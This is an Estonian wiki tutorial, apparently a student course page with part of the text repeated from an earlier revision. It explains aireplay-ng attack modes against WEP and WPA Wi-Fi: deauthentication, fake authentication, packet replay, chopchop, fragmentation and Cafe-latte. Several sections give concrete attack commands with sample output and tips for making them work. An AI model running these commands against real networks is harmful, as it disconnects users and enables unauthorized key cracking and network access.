* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:44:12Z

Tliiv: /* Open Authentication */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

